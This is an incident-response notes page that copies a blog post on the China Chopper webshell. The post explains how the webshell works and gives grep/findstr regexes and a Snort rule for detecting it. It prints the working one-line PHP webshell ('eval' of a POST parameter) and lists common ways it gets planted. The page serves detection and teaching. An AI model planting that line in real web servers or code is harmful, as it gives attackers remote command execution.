Digital Forensics & Incident Response
  • Welcome
  • General Notes
    • Azure Blob storage with NGINX proxy
    • Install and Configure ZeroTier client
    • S3FS Fuse and MinIO
    • Enable nested VT-X/AMD-V
    • mitm proxy
    • Exploring Volume Shadow Copies Manually
    • Resize VMDK/VDI
    • Resize VMDK on ESXi
    • Convert raw to vmdk
    • Favicon hashing and hunting with Shodan
    • WinRM/RemotePS
    • MinIO/S3/R2 ghost files
    • Mount E01 containing VMDK/XFS from RHEL system
    • Disk images for various filesystems and configurations
      • ext4 with LVM and RAID5 (3 disks)
      • ZFS
      • UFS, FFS, BTRFS, XFS
      • ext4, LVM, and LUKS1/LUKS2
      • NTFS, FAT32, with BitLocker
      • NTFS, FAT32, exFAT with TrueCrypt, VeraCrypt
    • VirtualBox adapters greyed out
    • Exporting SQLite blob data from standalone SQLite database using command line tools
  • Microsoft Defender KQL
    • Introduction to KQL
  • Windows Forensics
    • PsExec
      • PsExec and NTUSER data
    • Security Patch/KB Install Date
  • Linux Forensics
    • Inspecting RPM/DEB packages
    • Common Locations
  • ESXi Forensics
    • Mount external USB device in ESXi hypervisor
    • Understanding ESXi
      • Partitions / Volumes
      • ESXi console / shell
      • Guest Virtual Machines
    • General Notes
    • Triage and Imaging
    • ESXi VMFS Exploration
    • Export OVF from ESXi using OVF Tool
    • Identification, acquisition, and examination of iSCSI LUNs and VMFS datastores
  • Memory Forensics
    • Volatility
      • Volatility3 core commands
      • Build Custom Linux Profile for Volatility
      • Generate custom profile using btf2json
      • Banners, isfinfo, and custom profiles
      • Volatility2 core commands
      • 3rd Party Plugins
    • Acquisition
      • ESXi / VMware Workstation snapshots
      • DumpIt
      • WinPMem
      • Linux / AVML
  • Incident Response
    • Ivanti Connect Secure Auth Bypass and Remote Code Authentication CVE-2024-21887
    • VirusTotal & hash lists
    • Unix-like Artifacts Collector (UAC)
      • Setup MinIO (object storage)
      • Create S3 pre-signed URL
      • UAC and pre-signed URLs
    • Acquiring Linux VPS via SSH
    • AVML dump to SMB / AWS
    • China Chopper webshell
    • Logging Powershell activities
    • Compromised UniFi Controller
    • AnyDesk Remote Access
    • Mounting UFS VMDK from NetScaler/Citrix ADC
  • iOS Forensics
    • Checkm8 / checkra1n acquisitions/extractions
  • CTF / Challenges
    • 13Cubed Linux memory forensics
    • Compromised Windows Server 2022 (simulation)
      • FTK Imager
      • Autopsy Forensics
      • Plaso
      • Events Ripper
      • EZ tools
    • DEFCON 2019 forensics
    • Tomcat shells
    • Magnet Weekly CTF
      • Magnet CTF Week 0
      • Magnet CTF Week 1
    • DFIR Madness CTF
      • Case 001 - Szechuan Sauce
  • Log Files
    • Windows
      • Generating Log Timelines
  • Malware Analysis
    • Identifying UPX packed ELF, decompressing, fixing, and analysing Linux malware
    • PDF Analysis
  • Walking the VAD tree
  • OpenCTI
    • What is CTI/OpenCTI?
    • Setting up OpenCTI
    • Container Management
    • Configure Connectors
  • Vulnerability Management
    • Setting Up Nessus (Essentials)
    • Troubleshooting
  • Privacy
Powered by GitBook
On this page
  • What is the China Chopper Webshell, and how to find it on a compromised system?
  • What is China Chopper?
  • How can i detect this webshell on my webserver?
  • How detect the malicious network traffic?
  • References

Was this helpful?

  1. Incident Response

China Chopper webshell

PreviousAVML dump to SMB / AWSNextLogging Powershell activities

Last updated 4 years ago

Was this helpful?

Copied from Andrea Fortuna's website;

What is the China Chopper Webshell, and how to find it on a compromised system?

March 28, 2018

Some days ago, during a chat with a friend who works in a small software development company, the webshells topic has come up.

During the migration of a production system, my friend found some suspicious .php files, which turned out to be China Chopper webshells.

A simple software upgrade turned into a cybersecurity nightmare.

What is China Chopper?

China Chopper is a 4KB Web shell first discovered in 2012.

It is widely used by Chinese and other malicious actors, including APT groups, to remotely access compromised Web servers.

The webshell consists mainly of two parts, the client interface (caidao.exe) and a small file placed on the compromised web server.

Why this webshell is so dangerous and hard to find?

The file dropped on the compromised server is really small. For example, the PHP version (the file found by my friend) is composed by a single line of code:

<?php @eval($_POST['password']);?>

Also with a limited acces to the compromized host, is very simple for an attacker to push this small code into a file.

So, all the logic is delegated to the client (caidao.exe) that communicates directly with the file dropped on webserver and provides a lot of interesting feature, like a File explorer, a DataBase client, an interactive command shell and a “Security Scan” useful to perform brute-force password guessing against authentication portals.

The China Chopper can run on any web server that is capable of running JSP, ASP, ASPX, PHP, or CFM, on both Windows and Linux.

Due to the size of the malware’s payload, delivery mechanism can be very flexible, for example:

  • WebDAV file upload

  • JBoss jmx-console or Apache Tomcat management pages

  • Cross-site scripting (XSS)

  • SQL injection

  • Vulnerabilities in applications/services

  • File processing vulnerabilities

  • Remote file include (RFI) and local file include (LFI) vulnerabilities

  • Lateral propagation from other access

This OS and application flexibility makes this an even more dangerous Web shell.

How can i detect this webshell on my webserver?

The quickest and easiest method is using regular expressions. On a linux machine, an egrep across your Web directory can help identify infected files (for .PHP version):

egrep -re ' [<][?]php\s\@eval[(]\$_POST\[.+\][)];[?][>]' *.php

On a Windows machine, you can search files using regular expressions by using the native findstr command:

findstr /R /S "[<][?]php.\@eval[(]\$_POST.*[)];[?][>]" *.php

and for .aspx version:

findstr /R /S "[<]\%\@.Page.Language=.Jscript.\%[>][<]\%eval.Request\.Item.*unsafe" *.aspx

How detect the malicious network traffic?

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS 
(msg: "China Chopper with first Command Detected";
flow:to_server,established; content: "FromBase64String";
content: "z1"; content:"POST"; nocase;http_method;
reference:url,http://www.fireeye.com/blog/technical/botnet-activities-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html;
classtype:web-application-attack; sid: 900000101;)

References

An analysis of caidao.exe is available here:

You can use a Snort IDS signature :

https://www.andreafortuna.org/2018/03/28/what-is-the-china-chopper-webshell-and-how-to-find-it-on-a-compromized-system/
https://www.hybrid-analysis.com/sample/be24561427d754c0c150272cab5017d5a2da64d41bec74416b8ae363fb07fd77?environmentId=100
published by FireEye
http://informationonsecurity.blogspot.it/2012/11/china-chopper-webshell.html
https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html
http://blog.opensecurityresearch.com/2012/09/manually-exploiting-tomcat-manager.html
https://www.hybrid-analysis.com/sample/be24561427d754c0c150272cab5017d5a2da64d41bec74416b8ae363fb07fd77?environmentId=100